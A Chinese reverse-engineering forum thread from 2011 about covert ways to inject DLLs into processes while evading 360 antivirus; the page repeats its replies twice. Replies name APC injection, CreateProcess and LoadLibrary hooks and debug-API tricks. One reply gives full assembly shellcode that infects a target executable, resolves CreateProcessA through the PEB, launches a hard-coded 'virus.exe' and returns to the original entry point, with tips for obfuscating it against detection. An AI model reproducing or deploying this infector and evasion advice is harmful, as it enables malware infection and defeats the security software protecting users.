[讨论] 有没有另类的点的注入DLL方法-编程技术-看雪-安全社区|安全招聘|kanxue.com

最新回复 (12)
sillyer 雪币： 243 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 23 粉丝 0 关注私信	sillyer 2 楼 WriteProcessMemory被360吃的紧紧的 2011-1-29 18:42 0
清茶雪币： 345 活跃值： (25) 能力值： ( LV2，RANK：10 ) 在线值：发帖 28 回帖 99 粉丝 0 关注私信	清茶 3 楼所以我说嘛要另类一点的希望那些分析病毒的大牛放出一点方法 2011-1-29 18:44 0
wxhanshan 雪币： 225 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 10 回帖 226 粉丝 0 关注私信	wxhanshan 4 楼学习等待大牛 2011-1-29 19:43 0
blueapplez 雪币： 458 活跃值： (421) 能力值： ( LV9，RANK：610 ) 在线值：发帖 90 回帖 1047 粉丝 6 关注私信	blueapplez 14 5 楼 apc线程插入不过不太好用偶尔会失败。 http://hi.baidu.com/blueapple_c/blog/item/2bdae9cb2501e295c81768c7.html 另一种 hook Explorer 的 createProcess 先挂起新进程然后修改入口点 http://bbs.pediy.com/showthread.php?t=128076 2011-1-29 20:43 0
为个润雪币： 233 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 60 粉丝 0 关注私信	为个润 6 楼学习等待大牛 2011-1-29 20:45 0
freakish 雪币： 1157 活跃值： (847) 能力值： ( LV8，RANK：150 ) 在线值：发帖 33 回帖 203 粉丝 91 关注私信	freakish 1 7 楼 dll陷阱如何呢 2011-1-30 16:32 0
网络游侠雪币： 0 活跃值： (954) 能力值： ( LV3，RANK：30 ) 在线值：发帖 19 回帖 971 粉丝 15 关注私信	网络游侠 8 楼还有一种直接shellcode感染目标程序进行注入. asm pushad {根据PEB结构获得kernel32.dll基址} mov eax,fs:$30 mov eax,[eax+$0c] mov esi,[eax+$1c] lodsd dw $9090 nop //分块标志 {=================================} mov eax,[eax+$08] //eax=Kernel32基址 {根据引出表获得CreateProcessA函数的地址} mov ebp,eax mov eax,[eax+$3C] //eax=eax._lfanew add eax,ebp mov eax,[eax+$78] //eax=eax.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT] add eax,ebp dw $9090 nop {=================================} mov ebx,[eax+$18] //ebx=eax.NumberOfNames dec ebx mov ecx,[eax+$20] //ecx=eax.AddressOfNames add ecx,ebp //ecx指向函数名数组 xor edx,edx dec edx dw $9090 nop {=================================} search: //搜索需要的函数名 inc edx mov esi,[ecx+edx4] add esi,ebp //esi指向当前搜索到的函数名 cmp dword ptr [esi], $61657243 //'Crea' jne search cmp dword ptr [esi+4],$72506574 //'tePr' jne search cmp dword ptr [esi+8],$7365636f //'oces' jne search cmp word ptr [esi+12],$4173 //'sA' jne search dw $9090 nop mov ebx,[eax+$24] //ebx=eax.AddressOfNameOrdinal add ebx,ebp //ebx指向输出序号数组 mov edx,[ebx+2edx] shl edx,16 shr edx,16 mov ebx,[eax+$1c] //ebx=eax.AddressOfFunctions add ebx,ebp //ebx指向函数地址数组 dw $9090 nop {=================================} mov eax,[ebx+edx*4] add eax,ebp mov esi,eax {构建字符串} mov ebp,esp sub esp,$64 //分配100个字节作为局部变量 mov [ebp-$A],$75726976 mov [ebp-$6],$78652e73 dw $9090 nop {=================================} mov word ptr [ebp-$2],$0065 //构造字符串 lea ebx,[ebp-$64] mov ecx,$44 //填充StartupInfo参数 mov edi,ebx xor eax,eax rep stosb //清零 dw $9090 nop mov [ebx+$2C],$1 //ebx.dwFlags=STARTF_USESHOWWINDOW lea ecx,[ebp-$20] lea eax,[ebp-$A] //eax指向文件名字符串 {调用CreateProcessA} 这里自己可以实现LoadLibraryA push ecx //TProcessInformation push ebx //StartupInfo push 0 push 0 push 0 push 1 push 0 push 0 push eax //文件名 push 0 call esi //调用} dw $9090 nop {=================================} add esp,$64 popad jmp eax //跳向原始OEP dd $90909090 nop nop nop nop nop end; 这里new一块内存，将$0065 分成2字节随机存放。将LoadLibraryA放到随机分配的内存中去，然后jmp 过去，入口上弄一段随机花. 2011-1-31 08:35 0
freakish 雪币： 1157 活跃值： (847) 能力值： ( LV8，RANK：150 ) 在线值：发帖 33 回帖 203 粉丝 91 关注私信	freakish 1 9 楼加壳的基本原理嘛 2011-1-31 09:06 0
yy大雄雪币： 183 活跃值： (1178) 能力值： ( LV3，RANK：30 ) 在线值：发帖 22 回帖 332 粉丝 1 关注私信	yy大雄 10 楼 LZ 是想不通过写目标进程来插入到目标进程吧研究些软件的溢出说不定会有不一样的效果 2011-1-31 09:35 0
PEBOSS 雪币： 33 活跃值： (11) 能力值： ( LV2，RANK：10 ) 在线值：发帖 144 回帖 856 粉丝 0 关注私信	PEBOSS 11 楼再另类的发出来就不另类了另类还得自己创造 2011-1-31 17:00 0
邓韬雪币： 278 活跃值： (709) 能力值： ( LV15，RANK：520 ) 在线值：发帖 265 回帖 1670 粉丝 1 关注私信	邓韬 9 12 楼 inline hook LoadLibrary 2011-2-4 20:19 0
NONAME剑人雪币： 740 活跃值： (952) 能力值： ( LV9，RANK：160 ) 在线值：发帖 59 回帖 407 粉丝 13 关注私信	NONAME剑人 3 13 楼多行不义必自毙啊。直接debug api如何？创建进程时标志个DEBUG，先停一下，保护下寄存器后直接改eip，接着再控回来…… 2011-2-4 22:19 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

最新回复 (12)
sillyer 雪币： 243 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 23 粉丝 0 关注私信	sillyer 2 楼 WriteProcessMemory被360吃的紧紧的 2011-1-29 18:42 0
清茶雪币： 345 活跃值： (25) 能力值： ( LV2，RANK：10 ) 在线值：发帖 28 回帖 99 粉丝 0 关注私信	清茶 3 楼所以我说嘛要另类一点的希望那些分析病毒的大牛放出一点方法 2011-1-29 18:44 0
wxhanshan 雪币： 225 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 10 回帖 226 粉丝 0 关注私信	wxhanshan 4 楼学习等待大牛 2011-1-29 19:43 0
blueapplez 雪币： 458 活跃值： (421) 能力值： ( LV9，RANK：610 ) 在线值：发帖 90 回帖 1047 粉丝 6 关注私信	blueapplez 14 5 楼 apc线程插入不过不太好用偶尔会失败。 http://hi.baidu.com/blueapple_c/blog/item/2bdae9cb2501e295c81768c7.html 另一种 hook Explorer 的 createProcess 先挂起新进程然后修改入口点 http://bbs.pediy.com/showthread.php?t=128076 2011-1-29 20:43 0
为个润雪币： 233 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 60 粉丝 0 关注私信	为个润 6 楼学习等待大牛 2011-1-29 20:45 0
freakish 雪币： 1157 活跃值： (847) 能力值： ( LV8，RANK：150 ) 在线值：发帖 33 回帖 203 粉丝 91 关注私信	freakish 1 7 楼 dll陷阱如何呢 2011-1-30 16:32 0
网络游侠雪币： 0 活跃值： (954) 能力值： ( LV3，RANK：30 ) 在线值：发帖 19 回帖 971 粉丝 15 关注私信	网络游侠 8 楼还有一种直接shellcode感染目标程序进行注入. asm pushad {根据PEB结构获得kernel32.dll基址} mov eax,fs:$30 mov eax,[eax+$0c] mov esi,[eax+$1c] lodsd dw $9090 nop //分块标志 {=================================} mov eax,[eax+$08] //eax=Kernel32基址 {根据引出表获得CreateProcessA函数的地址} mov ebp,eax mov eax,[eax+$3C] //eax=eax._lfanew add eax,ebp mov eax,[eax+$78] //eax=eax.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT] add eax,ebp dw $9090 nop {=================================} mov ebx,[eax+$18] //ebx=eax.NumberOfNames dec ebx mov ecx,[eax+$20] //ecx=eax.AddressOfNames add ecx,ebp //ecx指向函数名数组 xor edx,edx dec edx dw $9090 nop {=================================} search: //搜索需要的函数名 inc edx mov esi,[ecx+edx4] add esi,ebp //esi指向当前搜索到的函数名 cmp dword ptr [esi], $61657243 //'Crea' jne search cmp dword ptr [esi+4],$72506574 //'tePr' jne search cmp dword ptr [esi+8],$7365636f //'oces' jne search cmp word ptr [esi+12],$4173 //'sA' jne search dw $9090 nop mov ebx,[eax+$24] //ebx=eax.AddressOfNameOrdinal add ebx,ebp //ebx指向输出序号数组 mov edx,[ebx+2edx] shl edx,16 shr edx,16 mov ebx,[eax+$1c] //ebx=eax.AddressOfFunctions add ebx,ebp //ebx指向函数地址数组 dw $9090 nop {=================================} mov eax,[ebx+edx*4] add eax,ebp mov esi,eax {构建字符串} mov ebp,esp sub esp,$64 //分配100个字节作为局部变量 mov [ebp-$A],$75726976 mov [ebp-$6],$78652e73 dw $9090 nop {=================================} mov word ptr [ebp-$2],$0065 //构造字符串 lea ebx,[ebp-$64] mov ecx,$44 //填充StartupInfo参数 mov edi,ebx xor eax,eax rep stosb //清零 dw $9090 nop mov [ebx+$2C],$1 //ebx.dwFlags=STARTF_USESHOWWINDOW lea ecx,[ebp-$20] lea eax,[ebp-$A] //eax指向文件名字符串 {调用CreateProcessA} 这里自己可以实现LoadLibraryA push ecx //TProcessInformation push ebx //StartupInfo push 0 push 0 push 0 push 1 push 0 push 0 push eax //文件名 push 0 call esi //调用} dw $9090 nop {=================================} add esp,$64 popad jmp eax //跳向原始OEP dd $90909090 nop nop nop nop nop end; 这里new一块内存，将$0065 分成2字节随机存放。将LoadLibraryA放到随机分配的内存中去，然后jmp 过去，入口上弄一段随机花. 2011-1-31 08:35 0
freakish 雪币： 1157 活跃值： (847) 能力值： ( LV8，RANK：150 ) 在线值：发帖 33 回帖 203 粉丝 91 关注私信	freakish 1 9 楼加壳的基本原理嘛 2011-1-31 09:06 0
yy大雄雪币： 183 活跃值： (1178) 能力值： ( LV3，RANK：30 ) 在线值：发帖 22 回帖 332 粉丝 1 关注私信	yy大雄 10 楼 LZ 是想不通过写目标进程来插入到目标进程吧研究些软件的溢出说不定会有不一样的效果 2011-1-31 09:35 0
PEBOSS 雪币： 33 活跃值： (11) 能力值： ( LV2，RANK：10 ) 在线值：发帖 144 回帖 856 粉丝 0 关注私信	PEBOSS 11 楼再另类的发出来就不另类了另类还得自己创造 2011-1-31 17:00 0
邓韬雪币： 278 活跃值： (709) 能力值： ( LV15，RANK：520 ) 在线值：发帖 265 回帖 1670 粉丝 1 关注私信	邓韬 9 12 楼 inline hook LoadLibrary 2011-2-4 20:19 0
NONAME剑人雪币： 740 活跃值： (952) 能力值： ( LV9，RANK：160 ) 在线值：发帖 59 回帖 407 粉丝 13 关注私信	NONAME剑人 3 13 楼多行不义必自毙啊。直接debug api如何？创建进程时标志个DEBUG，先停一下，保护下寄存器后直接改eip，接着再控回来…… 2011-2-4 22:19 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复